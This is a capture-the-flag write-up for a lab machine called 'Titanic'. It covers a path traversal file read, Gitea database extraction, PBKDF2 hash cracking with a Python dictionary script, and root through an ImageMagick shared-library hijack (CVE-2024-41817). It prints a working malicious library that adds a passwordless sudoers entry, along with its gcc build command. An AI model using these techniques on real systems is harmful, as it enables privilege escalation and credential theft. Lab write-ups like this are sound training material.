# Titanic

# 1. Enumeration

Start enumerating ports

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image.png)

A web application running on port 80, it is possible to book a trip

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%201.png)

Then we can download the resume of the booking

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%202.png)

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%203.png)

# 2. User flag

There is no input sanitization at all, we can access another files performing path traversal attack

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%204.png)

Easy to enumerate users, with a shell available

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%205.png)

A really easy way to access the user flag using this information

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%206.png)

This seems to be a unintended, anyways we need to do more steps further to gain a shell as this user, enumerate subdomains using FFUF

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%207.png)

A version controlling is present in this subdomain

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%208.png)

Check the compose file to find worthy paths

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%209.png)

This is just a clue, the root gitea directory is disclosed, now we need to find a config file or a database, those are possible paths

```python
/var/lib/gitea/data/gitea.db
/data/gitea/conf/app.ini
~/.gitea/custom/conf/app.ini
```

finally it is on `/home/developer/gitea/data/gitea/gitea.db`

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2010.png)

There is a hash with this password hash algorithm (pbkdf2)

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2011.png)

Search a little bit to be able to crack it using hashcat

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2012.png)

Follow the previous instructions but don’t forget it is in hexadecimal format, we need to pass it from hex to its original bytes format, then we can encode it to base64

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2013.png)

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2014.png)

Another way is using a python script, automating this process and avoiding using hashcat

```python
import hashlib
import binascii

def create_pbkdf2hash(password, salt, iterations, dklen):
	hash_gen = hashlib.pbkdf2_hmac('sha256',password.encode('utf-8'), salt, iterations, dklen)
	return hash_gen

def crack_hash(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
	with open(dictionary_file, 'r', encoding='utf-8') as f:
		count = 0;
		for line in f:
			password = line.strip()
			hash_value = create_pbkdf2hash(password, salt, iterations, dklen)
			count += 1
			if hash_value == target_hash:
				print(f'password found: {line}, count {count}')
		print('Password not found')
		

salt = binascii.unhexlify('salt')
target_hash = binascii.unhexlify('hash')
dictionary_file = '/usr/share/wordlist/rockyou.txt'
crack_hash(dictionary_file, target_hash, salt)
```

Then password is found and we can access as developer through ssh

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2015.png)

# 3.Priv esc

In opt there are some automation scripts, this takes every .jpg in a directory and it is passed to `magick` tool to identify every image

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2016.png)

Checking it version we can see it is vulnerable to CVE-2024-41817, basically it is compiled by gcc, imagemagick is leaving some environment variables (LD_LIBRARY_PATH, MAGICK_COINFIGURE_PAHT) with insecure paths, if those paths do not exist, the tool will fallback using shared libraries present in the current directory

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2017.png)

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2018.png)

We have control over the current directory where it is executing, use the POC to create a malicious shared library

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2019.png)

Wait a little bit until it is compiled and get the root flag

![image.png](Titanic%201eab9525529180a9b52fc9a7eb126a50/image%2020.png)

Another way to do it, giving a root shell to developer user

```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("echo 'developer ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers");
}
```

```bash
gcc -fPIC -shared -o ./libxcb.so.1 a.c -nostartfiles
```

Machine pwned!!!@